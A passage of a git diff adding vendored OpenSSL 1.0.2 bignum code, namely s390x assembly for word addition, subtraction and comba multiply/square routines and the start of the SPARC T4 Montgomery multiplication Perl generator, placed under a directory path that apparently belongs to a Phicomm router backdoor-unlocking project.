+	nr	%r6,%r5		// len%4
+	sra	%r5,2		// len/4, use sra because it sets condition code
+	jz	.Loop1_add	// carry is incidentally cleared if branch taken
+	algr	%r2,%r2		// clear carry
+
+.Loop4_add:
+	lg	%r0,0(%r2,%r3)
+	alcg	%r0,0(%r2,%r4)
+	stg	%r0,0(%r2,%r1)
+	lg	%r0,8(%r2,%r3)
+	alcg	%r0,8(%r2,%r4)
+	stg	%r0,8(%r2,%r1)
+	lg	%r0,16(%r2,%r3)
+	alcg	%r0,16(%r2,%r4)
+	stg	%r0,16(%r2,%r1)
+	lg	%r0,24(%r2,%r3)
+	alcg	%r0,24(%r2,%r4)
+	stg	%r0,24(%r2,%r1)
+
+	la	%r2,32(%r2)	// i+=4
+	brct	%r5,.Loop4_add
+
+	la	%r6,1(%r6)	// see if len%4 is zero ...
+	brct	%r6,.Loop1_add	// without touching condition code:-)
+
+.Lexit_add:
+	lghi	%r2,0
+	alcgr	%r2,%r2
+	lg	%r6,48(%r15)
+	br	%r14
+
+.Loop1_add:
+	lg	%r0,0(%r2,%r3)
+	alcg	%r0,0(%r2,%r4)
+	stg	%r0,0(%r2,%r1)
+
+	la	%r2,8(%r2)	// i++
+	brct	%r6,.Loop1_add
+
+	j	.Lexit_add
+.size	bn_add_words,.-bn_add_words
+
+// BN_ULONG bn_sub_words(BN_ULONG *r2,BN_ULONG *r3,BN_ULONG *r4,int r5);
+.globl	bn_sub_words
+.type	bn_sub_words,@function
+.align	4
+bn_sub_words:
+	la	%r1,0(%r2)	// put rp aside
+	lghi	%r2,0		// i=0
+	ltgfr	%r5,%r5
+	bler	%r14		// if (len<=0) return 0;
+
+	stg	%r6,48(%r15)
+	lghi	%r6,3
+	nr	%r6,%r5		// len%4
+	sra	%r5,2		// len/4, use sra because it sets condition code
+	jnz	.Loop4_sub	// borrow is incidentally cleared if branch taken
+	slgr	%r2,%r2		// clear borrow
+
+.Loop1_sub:
+	lg	%r0,0(%r2,%r3)
+	slbg	%r0,0(%r2,%r4)
+	stg	%r0,0(%r2,%r1)
+
+	la	%r2,8(%r2)	// i++
+	brct	%r6,.Loop1_sub
+	j	.Lexit_sub
+
+.Loop4_sub:
+	lg	%r0,0(%r2,%r3)
+	slbg	%r0,0(%r2,%r4)
+	stg	%r0,0(%r2,%r1)
+	lg	%r0,8(%r2,%r3)
+	slbg	%r0,8(%r2,%r4)
+	stg	%r0,8(%r2,%r1)
+	lg	%r0,16(%r2,%r3)
+	slbg	%r0,16(%r2,%r4)
+	stg	%r0,16(%r2,%r1)
+	lg	%r0,24(%r2,%r3)
+	slbg	%r0,24(%r2,%r4)
+	stg	%r0,24(%r2,%r1)
+
+	la	%r2,32(%r2)	// i+=4
+	brct	%r5,.Loop4_sub
+
+	la	%r6,1(%r6)	// see if len%4 is zero ...
+	brct	%r6,.Loop1_sub	// without touching condition code:-)
+
+.Lexit_sub:
+	lghi	%r2,0
+	slbgr	%r2,%r2
+	lcgr	%r2,%r2
+	lg	%r6,48(%r15)
+	br	%r14
+.size	bn_sub_words,.-bn_sub_words
+
+#define c1	%r1
+#define c2	%r5
+#define c3	%r8
+
+#define mul_add_c(ai,bi,c1,c2,c3)	\
+	lg	%r7,ai*8(%r3);		\
+	mlg	%r6,bi*8(%r4);		\
+	algr	c1,%r7;			\
+	alcgr	c2,%r6;			\
+	alcgr	c3,zero
+
+// void bn_mul_comba8(BN_ULONG *r2,BN_ULONG *r3,BN_ULONG *r4);
+.globl	bn_mul_comba8
+.type	bn_mul_comba8,@function
+.align	4
+bn_mul_comba8:
+	stmg	%r6,%r8,48(%r15)
+
+	lghi	c1,0
+	lghi	c2,0
+	lghi	c3,0
+	lghi	zero,0
+
+	mul_add_c(0,0,c1,c2,c3);
+	stg	c1,0*8(%r2)
+	lghi	c1,0
+
+	mul_add_c(0,1,c2,c3,c1);
+	mul_add_c(1,0,c2,c3,c1);
+	stg	c2,1*8(%r2)
+	lghi	c2,0
+
+	mul_add_c(2,0,c3,c1,c2);
+	mul_add_c(1,1,c3,c1,c2);
+	mul_add_c(0,2,c3,c1,c2);
+	stg	c3,2*8(%r2)
+	lghi	c3,0
+
+	mul_add_c(0,3,c1,c2,c3);
+	mul_add_c(1,2,c1,c2,c3);
+	mul_add_c(2,1,c1,c2,c3);
+	mul_add_c(3,0,c1,c2,c3);
+	stg	c1,3*8(%r2)
+	lghi	c1,0
+
+	mul_add_c(4,0,c2,c3,c1);
+	mul_add_c(3,1,c2,c3,c1);
+	mul_add_c(2,2,c2,c3,c1);
+	mul_add_c(1,3,c2,c3,c1);
+	mul_add_c(0,4,c2,c3,c1);
+	stg	c2,4*8(%r2)
+	lghi	c2,0
+
+	mul_add_c(0,5,c3,c1,c2);
+	mul_add_c(1,4,c3,c1,c2);
+	mul_add_c(2,3,c3,c1,c2);
+	mul_add_c(3,2,c3,c1,c2);
+	mul_add_c(4,1,c3,c1,c2);
+	mul_add_c(5,0,c3,c1,c2);
+	stg	c3,5*8(%r2)
+	lghi	c3,0
+
+	mul_add_c(6,0,c1,c2,c3);
+	mul_add_c(5,1,c1,c2,c3);
+	mul_add_c(4,2,c1,c2,c3);
+	mul_add_c(3,3,c1,c2,c3);
+	mul_add_c(2,4,c1,c2,c3);
+	mul_add_c(1,5,c1,c2,c3);
+	mul_add_c(0,6,c1,c2,c3);
+	stg	c1,6*8(%r2)
+	lghi	c1,0
+
+	mul_add_c(0,7,c2,c3,c1);
+	mul_add_c(1,6,c2,c3,c1);
+	mul_add_c(2,5,c2,c3,c1);
+	mul_add_c(3,4,c2,c3,c1);
+	mul_add_c(4,3,c2,c3,c1);
+	mul_add_c(5,2,c2,c3,c1);
+	mul_add_c(6,1,c2,c3,c1);
+	mul_add_c(7,0,c2,c3,c1);
+	stg	c2,7*8(%r2)
+	lghi	c2,0
+
+	mul_add_c(7,1,c3,c1,c2);
+	mul_add_c(6,2,c3,c1,c2);
+	mul_add_c(5,3,c3,c1,c2);
+	mul_add_c(4,4,c3,c1,c2);
+	mul_add_c(3,5,c3,c1,c2);
+	mul_add_c(2,6,c3,c1,c2);
+	mul_add_c(1,7,c3,c1,c2);
+	stg	c3,8*8(%r2)
+	lghi	c3,0
+
+	mul_add_c(2,7,c1,c2,c3);
+	mul_add_c(3,6,c1,c2,c3);
+	mul_add_c(4,5,c1,c2,c3);
+	mul_add_c(5,4,c1,c2,c3);
+	mul_add_c(6,3,c1,c2,c3);
+	mul_add_c(7,2,c1,c2,c3);
+	stg	c1,9*8(%r2)
+	lghi	c1,0
+
+	mul_add_c(7,3,c2,c3,c1);
+	mul_add_c(6,4,c2,c3,c1);
+	mul_add_c(5,5,c2,c3,c1);
+	mul_add_c(4,6,c2,c3,c1);
+	mul_add_c(3,7,c2,c3,c1);
+	stg	c2,10*8(%r2)
+	lghi	c2,0
+
+	mul_add_c(4,7,c3,c1,c2);
+	mul_add_c(5,6,c3,c1,c2);
+	mul_add_c(6,5,c3,c1,c2);
+	mul_add_c(7,4,c3,c1,c2);
+	stg	c3,11*8(%r2)
+	lghi	c3,0
+
+	mul_add_c(7,5,c1,c2,c3);
+	mul_add_c(6,6,c1,c2,c3);
+	mul_add_c(5,7,c1,c2,c3);
+	stg	c1,12*8(%r2)
+	lghi	c1,0
+
+
+	mul_add_c(6,7,c2,c3,c1);
+	mul_add_c(7,6,c2,c3,c1);
+	stg	c2,13*8(%r2)
+	lghi	c2,0
+
+	mul_add_c(7,7,c3,c1,c2);
+	stg	c3,14*8(%r2)
+	stg	c1,15*8(%r2)
+
+	lmg	%r6,%r8,48(%r15)
+	br	%r14
+.size	bn_mul_comba8,.-bn_mul_comba8
+
+// void bn_mul_comba4(BN_ULONG *r2,BN_ULONG *r3,BN_ULONG *r4);
+.globl	bn_mul_comba4
+.type	bn_mul_comba4,@function
+.align	4
+bn_mul_comba4:
+	stmg	%r6,%r8,48(%r15)
+
+	lghi	c1,0
+	lghi	c2,0
+	lghi	c3,0
+	lghi	zero,0
+
+	mul_add_c(0,0,c1,c2,c3);
+	stg	c1,0*8(%r3)
+	lghi	c1,0
+
+	mul_add_c(0,1,c2,c3,c1);
+	mul_add_c(1,0,c2,c3,c1);
+	stg	c2,1*8(%r2)
+	lghi	c2,0
+
+	mul_add_c(2,0,c3,c1,c2);
+	mul_add_c(1,1,c3,c1,c2);
+	mul_add_c(0,2,c3,c1,c2);
+	stg	c3,2*8(%r2)
+	lghi	c3,0
+
+	mul_add_c(0,3,c1,c2,c3);
+	mul_add_c(1,2,c1,c2,c3);
+	mul_add_c(2,1,c1,c2,c3);
+	mul_add_c(3,0,c1,c2,c3);
+	stg	c1,3*8(%r2)
+	lghi	c1,0
+
+	mul_add_c(3,1,c2,c3,c1);
+	mul_add_c(2,2,c2,c3,c1);
+	mul_add_c(1,3,c2,c3,c1);
+	stg	c2,4*8(%r2)
+	lghi	c2,0
+
+	mul_add_c(2,3,c3,c1,c2);
+	mul_add_c(3,2,c3,c1,c2);
+	stg	c3,5*8(%r2)
+	lghi	c3,0
+
+	mul_add_c(3,3,c1,c2,c3);
+	stg	c1,6*8(%r2)
+	stg	c2,7*8(%r2)
+
+	stmg	%r6,%r8,48(%r15)
+	br	%r14
+.size	bn_mul_comba4,.-bn_mul_comba4
+
+#define sqr_add_c(ai,c1,c2,c3)		\
+	lg	%r7,ai*8(%r3);		\
+	mlgr	%r6,%r7;		\
+	algr	c1,%r7;			\
+	alcgr	c2,%r6;			\
+	alcgr	c3,zero
+
+#define sqr_add_c2(ai,aj,c1,c2,c3)	\
+	lg	%r7,ai*8(%r3);		\
+	mlg	%r6,aj*8(%r3);		\
+	algr	c1,%r7;			\
+	alcgr	c2,%r6;			\
+	alcgr	c3,zero;		\
+	algr	c1,%r7;			\
+	alcgr	c2,%r6;			\
+	alcgr	c3,zero
+
+// void bn_sqr_comba8(BN_ULONG *r2,BN_ULONG *r3);
+.globl	bn_sqr_comba8
+.type	bn_sqr_comba8,@function
+.align	4
+bn_sqr_comba8:
+	stmg	%r6,%r8,48(%r15)
+
+	lghi	c1,0
+	lghi	c2,0
+	lghi	c3,0
+	lghi	zero,0
+
+	sqr_add_c(0,c1,c2,c3);
+	stg	c1,0*8(%r2)
+	lghi	c1,0
+
+	sqr_add_c2(1,0,c2,c3,c1);
+	stg	c2,1*8(%r2)
+	lghi	c2,0
+
+	sqr_add_c(1,c3,c1,c2);
+	sqr_add_c2(2,0,c3,c1,c2);
+	stg	c3,2*8(%r2)
+	lghi	c3,0
+
+	sqr_add_c2(3,0,c1,c2,c3);
+	sqr_add_c2(2,1,c1,c2,c3);
+	stg	c1,3*8(%r2)
+	lghi	c1,0
+
+	sqr_add_c(2,c2,c3,c1);
+	sqr_add_c2(3,1,c2,c3,c1);
+	sqr_add_c2(4,0,c2,c3,c1);
+	stg	c2,4*8(%r2)
+	lghi	c2,0
+
+	sqr_add_c2(5,0,c3,c1,c2);
+	sqr_add_c2(4,1,c3,c1,c2);
+	sqr_add_c2(3,2,c3,c1,c2);
+	stg	c3,5*8(%r2)
+	lghi	c3,0
+
+	sqr_add_c(3,c1,c2,c3);
+	sqr_add_c2(4,2,c1,c2,c3);
+	sqr_add_c2(5,1,c1,c2,c3);
+	sqr_add_c2(6,0,c1,c2,c3);
+	stg	c1,6*8(%r2)
+	lghi	c1,0
+
+	sqr_add_c2(7,0,c2,c3,c1);
+	sqr_add_c2(6,1,c2,c3,c1);
+	sqr_add_c2(5,2,c2,c3,c1);
+	sqr_add_c2(4,3,c2,c3,c1);
+	stg	c2,7*8(%r2)
+	lghi	c2,0
+
+	sqr_add_c(4,c3,c1,c2);
+	sqr_add_c2(5,3,c3,c1,c2);
+	sqr_add_c2(6,2,c3,c1,c2);
+	sqr_add_c2(7,1,c3,c1,c2);
+	stg	c3,8*8(%r2)
+	lghi	c3,0
+
+	sqr_add_c2(7,2,c1,c2,c3);
+	sqr_add_c2(6,3,c1,c2,c3);
+	sqr_add_c2(5,4,c1,c2,c3);
+	stg	c1,9*8(%r2)
+	lghi	c1,0
+
+	sqr_add_c(5,c2,c3,c1);
+	sqr_add_c2(6,4,c2,c3,c1);
+	sqr_add_c2(7,3,c2,c3,c1);
+	stg	c2,10*8(%r2)
+	lghi	c2,0
+
+	sqr_add_c2(7,4,c3,c1,c2);
+	sqr_add_c2(6,5,c3,c1,c2);
+	stg	c3,11*8(%r2)
+	lghi	c3,0
+
+	sqr_add_c(6,c1,c2,c3);
+	sqr_add_c2(7,5,c1,c2,c3);
+	stg	c1,12*8(%r2)
+	lghi	c1,0
+
+	sqr_add_c2(7,6,c2,c3,c1);
+	stg	c2,13*8(%r2)
+	lghi	c2,0
+
+	sqr_add_c(7,c3,c1,c2);
+	stg	c3,14*8(%r2)
+	stg	c1,15*8(%r2)
+
+	lmg	%r6,%r8,48(%r15)
+	br	%r14
+.size	bn_sqr_comba8,.-bn_sqr_comba8
+
+// void bn_sqr_comba4(BN_ULONG *r2,BN_ULONG *r3);
+.globl bn_sqr_comba4
+.type	bn_sqr_comba4,@function
+.align	4
+bn_sqr_comba4:
+	stmg	%r6,%r8,48(%r15)
+
+	lghi	c1,0
+	lghi	c2,0
+	lghi	c3,0
+	lghi	zero,0
+
+	sqr_add_c(0,c1,c2,c3);
+	stg	c1,0*8(%r2)
+	lghi	c1,0
+
+	sqr_add_c2(1,0,c2,c3,c1);
+	stg	c2,1*8(%r2)
+	lghi	c2,0
+
+	sqr_add_c(1,c3,c1,c2);
+	sqr_add_c2(2,0,c3,c1,c2);
+	stg	c3,2*8(%r2)
+	lghi	c3,0
+
+	sqr_add_c2(3,0,c1,c2,c3);
+	sqr_add_c2(2,1,c1,c2,c3);
+	stg	c1,3*8(%r2)
+	lghi	c1,0
+
+	sqr_add_c(2,c2,c3,c1);
+	sqr_add_c2(3,1,c2,c3,c1);
+	stg	c2,4*8(%r2)
+	lghi	c2,0
+
+	sqr_add_c2(3,2,c3,c1,c2);
+	stg	c3,5*8(%r2)
+	lghi	c3,0
+
+	sqr_add_c(3,c1,c2,c3);
+	stg	c1,6*8(%r2)
+	stg	c2,7*8(%r2)
+
+	lmg	%r6,%r8,48(%r15)
+	br	%r14
+.size	bn_sqr_comba4,.-bn_sqr_comba4
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparct4-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparct4-mont.pl
new file mode 100755
index 0000000..71b4500
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparct4-mont.pl
@@ -0,0 +1,1222 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by David S. Miller <davem@devemloft.net> and Andy Polyakov
+# <appro@openssl.org>. The module is licensed under 2-clause BSD
+# license. November 2012. All rights reserved.
+# ====================================================================
+
+######################################################################
+# Montgomery squaring-n-multiplication module for SPARC T4.
+#
+# The module consists of three parts:
+#
+# 1) collection of "single-op" subroutines that perform single
+#    operation, Montgomery squaring or multiplication, on 512-,
+#    1024-, 1536- and 2048-bit operands;
+# 2) collection of "multi-op" subroutines that perform 5 squaring and
+#    1 multiplication operations on operands of above lengths;
+# 3) fall-back and helper VIS3 subroutines.
+#
+# RSA sign is dominated by multi-op subroutine, while RSA verify and
+# DSA - by single-op. Special note about 4096-bit RSA verify result.
+# Operands are too long for dedicated hardware and it's handled by
+# VIS3 code, which is why you don't see any improvement. It's surely
+# possible to improve it [by deploying 'mpmul' instruction], maybe in
+# the future...
+#
+# Performance improvement.
+#
+# 64-bit process, VIS3:
+#                   sign    verify    sign/s verify/s
+# rsa 1024 bits 0.000628s 0.000028s   1592.4  35434.4
+# rsa 2048 bits 0.003282s 0.000106s    304.7   9438.3
+# rsa 4096 bits 0.025866s 0.000340s     38.7   2940.9
+# dsa 1024 bits 0.000301s 0.000332s   3323.7   3013.9
+# dsa 2048 bits 0.001056s 0.001233s    946.9    810.8
+#
+# 64-bit process, this module:
+#                   sign    verify    sign/s verify/s
+# rsa 1024 bits 0.000256s 0.000016s   3904.4  61411.9
+# rsa 2048 bits 0.000946s 0.000029s   1056.8  34292.7
+# rsa 4096 bits 0.005061s 0.000340s    197.6   2940.5
+# dsa 1024 bits 0.000176s 0.000195s   5674.7   5130.5
+# dsa 2048 bits 0.000296s 0.000354s   3383.2   2827.6
+#
+######################################################################
+# 32-bit process, VIS3:
+#                   sign    verify    sign/s verify/s
+# rsa 1024 bits 0.000665s 0.000028s   1504.8  35233.3
+# rsa 2048 bits 0.003349s 0.000106s    298.6   9433.4
+# rsa 4096 bits 0.025959s 0.000341s     38.5   2934.8
+# dsa 1024 bits 0.000320s 0.000341s   3123.3   2929.6
+# dsa 2048 bits 0.001101s 0.001260s    908.2    793.4
+#
+# 32-bit process, this module:
+#                   sign    verify    sign/s verify/s
+# rsa 1024 bits 0.000301s 0.000017s   3317.1  60240.0
+# rsa 2048 bits 0.001034s 0.000030s    966.9  33812.7
+# rsa 4096 bits 0.005244s 0.000341s    190.7   2935.4
+# dsa 1024 bits 0.000201s 0.000205s   4976.1   4879.2
+# dsa 2048 bits 0.000328s 0.000360s   3051.1   2774.2
+#
+# 32-bit code is prone to performance degradation as interrupt rate
+# dispatched to CPU executing the code grows. This is because in
+# standard process of handling interrupt in 32-bit process context
+# upper halves of most integer registers used as input or output are
+# zeroed. This renders result invalid, and operation has to be re-run.
+# If CPU is "bothered" with timer interrupts only, the penalty is
+# hardly measurable. But in order to mitigate this problem for higher
+# interrupt rates contemporary Linux kernel recognizes biased stack
+# even in 32-bit process context and preserves full register contents.
+# See http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=517ffce4e1a03aea979fe3a18a3dd1761a24fafb
+# for details.
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "sparcv9_modes.pl";
+
+$code.=<<___;
+#include "sparc_arch.h"
+
+#ifdef	__arch64__
+.register	%g2,#scratch
+.register	%g3,#scratch
+#endif
+
+.section	".text",#alloc,#execinstr
+
+#ifdef	__PIC__
+SPARC_PIC_THUNK(%g1)
+#endif
+___
+
+########################################################################
+# Register layout for mont[mul|sqr] instructions.
+# For details see "Oracle SPARC Architecture 2011" manual at
+# http://www.oracle.com/technetwork/server-storage/sun-sparc-enterprise/documentation/.
+#
+my @R=map("%f".2*$_,(0..11,30,31,12..29));
+my @N=(map("%l$_",(0..7)),map("%o$_",(0..5))); @N=(@N,@N,@N[0..3]);
+my @A=(@N[0..13],@R[14..31]);
+my @B=(map("%i$_",(0..5)),map("%l$_",(0..7))); @B=(@B,@B,map("%o$_",(0..3)));
+
+########################################################################
+# int bn_mul_mont_t4_$NUM(u64 *rp,const u64 *ap,const u64 *bp,
+#			  const u64 *np,const BN_ULONG *n0);
+#
+sub generate_bn_mul_mont_t4() {
+my $NUM=shift;
+my ($rp,$ap,$bp,$np,$sentinel)=map("%g$_",(1..5));
+
+$code.=<<___;
+.globl	bn_mul_mont_t4_$NUM
+.align	32
+bn_mul_mont_t4_$NUM:
+#ifdef	__arch64__
+	mov	0,$sentinel
+	mov	-128,%g4
+#elif defined(SPARCV9_64BIT_STACK)
+	SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
+	ld	[%g1+0],%g1	! OPENSSL_sparcv9_P[0]
+	mov	-2047,%g4
+	and	%g1,SPARCV9_64BIT_STACK,%g1
+	movrz	%g1,0,%g4
+	mov	-1,$sentinel
+	add	%g4,-128,%g4
+#else
+	mov	-1,$sentinel
+	mov	-128,%g4
+#endif
+	sllx	$sentinel,32,$sentinel
+	save	%sp,%g4,%sp
+#ifndef	__arch64__
+	save	%sp,-128,%sp	! warm it up
+	save	%sp,-128,%sp
+	save	%sp,-128,%sp
+	save	%sp,-128,%sp
+	save	%sp,-128,%sp
+	save	%sp,-128,%sp
+	restore
+	restore
+	restore
+	restore
+	restore
+	restore
+#endif
+	and	%sp,1,%g4
+	or	$sentinel,%fp,%fp
+	or	%g4,$sentinel,$sentinel
+
+	! copy arguments to global registers
+	mov	%i0,$rp
+	mov	%i1,$ap
+	mov	%i2,$bp
+	mov	%i3,$np
+	ld	[%i4+0],%f1	! load *n0
+	ld	[%i4+4],%f0
+	fsrc2	%f0,%f60
+___
+
+# load ap[$NUM] ########################################################
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+___
+for($i=0; $i<14 && $i<$NUM; $i++) {
+my $lo=$i<13?@A[$i+1]:"%o7";
+$code.=<<___;
+	ld	[$ap+$i*8+0],$lo
+	ld	[$ap+$i*8+4],@A[$i]
+	sllx	@A[$i],32,@A[$i]
+	or	$lo,@A[$i],@A[$i]
+___
+}
+for(; $i<$NUM; $i++) {
+my ($hi,$lo)=("%f".2*($i%4),"%f".(2*($i%4)+1));
+$code.=<<___;
+	ld	[$ap+$i*8+0],$lo
+	ld	[$ap+$i*8+4],$hi
+	fsrc2	$hi,@A[$i]
+___
+}
+# load np[$NUM] ########################################################
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+___
+for($i=0; $i<14 && $i<$NUM; $i++) {
+my $lo=$i<13?@N[$i+1]:"%o7";
+$code.=<<___;
+	ld	[$np+$i*8+0],$lo
+	ld	[$np+$i*8+4],@N[$i]
+	sllx	@N[$i],32,@N[$i]
+	or	$lo,@N[$i],@N[$i]
+___
+}
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+___
+for(; $i<28 && $i<$NUM; $i++) {
+my $lo=$i<27?@N[$i+1]:"%o7";
+$code.=<<___;
+	ld	[$np+$i*8+0],$lo
+	ld	[$np+$i*8+4],@N[$i]
+	sllx	@N[$i],32,@N[$i]
+	or	$lo,@N[$i],@N[$i]
+___
+}
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+___
+for(; $i<$NUM; $i++) {
+my $lo=($i<$NUM-1)?@N[$i+1]:"%o7";
+$code.=<<___;
+	ld	[$np+$i*8+0],$lo
+	ld	[$np+$i*8+4],@N[$i]
+	sllx	@N[$i],32,@N[$i]
+	or	$lo,@N[$i],@N[$i]
+___
+}
+$code.=<<___;
+	cmp	$ap,$bp
+	be	SIZE_T_CC,.Lmsquare_$NUM
+	nop
+___
+
+# load bp[$NUM] ########################################################
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+___
+for($i=0; $i<14 && $i<$NUM; $i++) {
+my $lo=$i<13?@B[$i+1]:"%o7";
+$code.=<<___;
+	ld	[$bp+$i*8+0],$lo
+	ld	[$bp+$i*8+4],@B[$i]
+	sllx	@B[$i],32,@B[$i]
+	or	$lo,@B[$i],@B[$i]
+___
+}
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+___
+for(; $i<$NUM; $i++) {
+my $lo=($i<$NUM-1)?@B[$i+1]:"%o7";
+$code.=<<___;
+	ld	[$bp+$i*8+0],$lo
+	ld	[$bp+$i*8+4],@B[$i]
+	sllx	@B[$i],32,@B[$i]
+	or	$lo,@B[$i],@B[$i]
+___
+}
+# magic ################################################################
+$code.=<<___;
+	.word	0x81b02920+$NUM-1	! montmul	$NUM-1
+.Lmresume_$NUM:
+	fbu,pn	%fcc3,.Lmabort_$NUM
+#ifndef	__arch64__
+	and	%fp,$sentinel,$sentinel
+	brz,pn	$sentinel,.Lmabort_$NUM
+#endif
+	nop
+#ifdef	__arch64__
+	restore
+	restore
+	restore
+	restore
+	restore
+#else
+	restore;		and	%fp,$sentinel,$sentinel
+	restore;		and	%fp,$sentinel,$sentinel
+	restore;		and	%fp,$sentinel,$sentinel
+	restore;		and	%fp,$sentinel,$sentinel
+	 brz,pn	$sentinel,.Lmabort1_$NUM
+	restore
+#endif
+___
+
+# save tp[$NUM] ########################################################
+for($i=0; $i<14 && $i<$NUM; $i++) {
+$code.=<<___;
+	movxtod	@A[$i],@R[$i]
+___
+}
+$code.=<<___;
+#ifdef	__arch64__
+	restore
+#else
+	 and	%fp,$sentinel,$sentinel
+	restore
+	 and	$sentinel,1,%o7
+	 and	%fp,$sentinel,$sentinel
+	 srl	%fp,0,%fp		! just in case?
+	 or	%o7,$sentinel,$sentinel
+	brz,a,pn $sentinel,.Lmdone_$NUM
+	mov	0,%i0		! return failure
+#endif
+___
+for($i=0; $i<12 && $i<$NUM; $i++) {
+@R[$i] =~ /%f([0-9]+)/;
+my $lo = "%f".($1+1);
+$code.=<<___;
+	st	$lo,[$rp+$i*8+0]
+	st	@R[$i],[$rp+$i*8+4]
+___
+}
+for(; $i<$NUM; $i++) {
+my ($hi,$lo)=("%f".2*($i%4),"%f".(2*($i%4)+1));
+$code.=<<___;
+	fsrc2	@R[$i],$hi
+	st	$lo,[$rp+$i*8+0]
+	st	$hi,[$rp+$i*8+4]
+___
+}
+$code.=<<___;
+	mov	1,%i0		! return success
+.Lmdone_$NUM:
+	ret
+	restore
+
+.Lmabort_$NUM:
+	restore
+	restore
+	restore
+	restore
+	restore
+.Lmabort1_$NUM:
+	restore
+
+	mov	0,%i0		! return failure
+	ret
+	restore
+
+.align	32
+.Lmsquare_$NUM:
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+	.word   0x81b02940+$NUM-1	! montsqr	$NUM-1
+	ba	.Lmresume_$NUM
+	nop
+.type	bn_mul_mont_t4_$NUM, #function
+.size	bn_mul_mont_t4_$NUM, .-bn_mul_mont_t4_$NUM
+___
+}
+
+for ($i=8;$i<=32;$i+=8) {
+	&generate_bn_mul_mont_t4($i);
+}
+
+########################################################################
+#
+sub load_ccr {
+my ($ptbl,$pwr,$ccr,$skip_wr)=@_;
+$code.=<<___;
+	srl	$pwr,	2,	%o4
+	and	$pwr,	3,	%o5
+	and	%o4,	7,	%o4
+	sll	%o5,	3,	%o5	! offset within first cache line
+	add	%o5,	$ptbl,	$ptbl	! of the pwrtbl
+	or	%g0,	1,	%o5
+	sll	%o5,	%o4,	$ccr
+___
+$code.=<<___	if (!$skip_wr);
+	wr	$ccr,	%g0,	%ccr
+___
+}
+sub load_b_pair {
+my ($pwrtbl,$B0,$B1)=@_;
+
+$code.=<<___;
+	ldx	[$pwrtbl+0*32],	$B0
+	ldx	[$pwrtbl+8*32],	$B1
+	ldx	[$pwrtbl+1*32],	%o4
+	ldx	[$pwrtbl+9*32],	%o5
+	movvs	%icc,	%o4,	$B0
+	ldx	[$pwrtbl+2*32],	%o4
+	movvs	%icc,	%o5,	$B1
+	ldx	[$pwrtbl+10*32],%o5
+	move	%icc,	%o4,	$B0
+	ldx	[$pwrtbl+3*32],	%o4
+	move	%icc,	%o5,	$B1
+	ldx	[$pwrtbl+11*32],%o5
+	movneg	%icc,	%o4,	$B0
+	ldx	[$pwrtbl+4*32],	%o4
+	movneg	%icc,	%o5,	$B1
+	ldx	[$pwrtbl+12*32],%o5
+	movcs	%xcc,	%o4,	$B0
+	ldx	[$pwrtbl+5*32],%o4
+	movcs	%xcc,	%o5,	$B1
+	ldx	[$pwrtbl+13*32],%o5
+	movvs	%xcc,	%o4,	$B0
+	ldx	[$pwrtbl+6*32],	%o4
+	movvs	%xcc,	%o5,	$B1
+	ldx	[$pwrtbl+14*32],%o5
+	move	%xcc,	%o4,	$B0
+	ldx	[$pwrtbl+7*32],	%o4
+	move	%xcc,	%o5,	$B1
+	ldx	[$pwrtbl+15*32],%o5
+	movneg	%xcc,	%o4,	$B0
+	add	$pwrtbl,16*32,	$pwrtbl
+	movneg	%xcc,	%o5,	$B1
+___
+}
+sub load_b {
+my ($pwrtbl,$Bi)=@_;
+
+$code.=<<___;
+	ldx	[$pwrtbl+0*32],	$Bi
+	ldx	[$pwrtbl+1*32],	%o4
+	ldx	[$pwrtbl+2*32],	%o5
+	movvs	%icc,	%o4,	$Bi
+	ldx	[$pwrtbl+3*32],	%o4
+	move	%icc,	%o5,	$Bi
+	ldx	[$pwrtbl+4*32],	%o5
+	movneg	%icc,	%o4,	$Bi
+	ldx	[$pwrtbl+5*32],	%o4
+	movcs	%xcc,	%o5,	$Bi
+	ldx	[$pwrtbl+6*32],	%o5
+	movvs	%xcc,	%o4,	$Bi
+	ldx	[$pwrtbl+7*32],	%o4
+	move	%xcc,	%o5,	$Bi
+	add	$pwrtbl,8*32,	$pwrtbl
+	movneg	%xcc,	%o4,	$Bi
+___
+}
+
+########################################################################
+# int bn_pwr5_mont_t4_$NUM(u64 *tp,const u64 *np,const BN_ULONG *n0,
+#			   const u64 *pwrtbl,int pwr,int stride);
+#
+sub generate_bn_pwr5_mont_t4() {
+my $NUM=shift;
+my ($tp,$np,$pwrtbl,$pwr,$sentinel)=map("%g$_",(1..5));
+
+$code.=<<___;
+.globl	bn_pwr5_mont_t4_$NUM
+.align	32
+bn_pwr5_mont_t4_$NUM:
+#ifdef	__arch64__
+	mov	0,$sentinel
+	mov	-128,%g4
+#elif defined(SPARCV9_64BIT_STACK)
+	SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
+	ld	[%g1+0],%g1	! OPENSSL_sparcv9_P[0]
+	mov	-2047,%g4
+	and	%g1,SPARCV9_64BIT_STACK,%g1
+	movrz	%g1,0,%g4
+	mov	-1,$sentinel
+	add	%g4,-128,%g4
+#else
+	mov	-1,$sentinel
+	mov	-128,%g4
+#endif
+	sllx	$sentinel,32,$sentinel
+	save	%sp,%g4,%sp
+#ifndef	__arch64__
+	save	%sp,-128,%sp	! warm it up
+	save	%sp,-128,%sp
+	save	%sp,-128,%sp
+	save	%sp,-128,%sp
+	save	%sp,-128,%sp
